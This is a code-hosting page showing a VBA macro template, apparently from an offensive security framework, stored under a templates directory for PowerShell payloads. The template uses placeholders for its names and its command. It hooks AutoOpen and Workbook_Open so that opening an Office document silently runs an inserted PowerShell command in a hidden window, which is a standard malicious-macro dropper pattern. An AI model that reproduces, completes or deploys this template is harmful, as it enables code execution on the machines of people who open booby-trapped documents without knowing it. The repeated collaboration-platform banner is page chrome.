Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/data/templates/scripts/to_powershell.vba.template
Views: 11782
Sub %{sub_auto_open}() Dim %{var_powershell} %{var_powershell} = %{powershell} Call Shell(%{var_powershell}, vbHide) End Sub Sub AutoOpen() %{sub_auto_open} End Sub Sub Workbook_Open() %{sub_auto_open} End Sub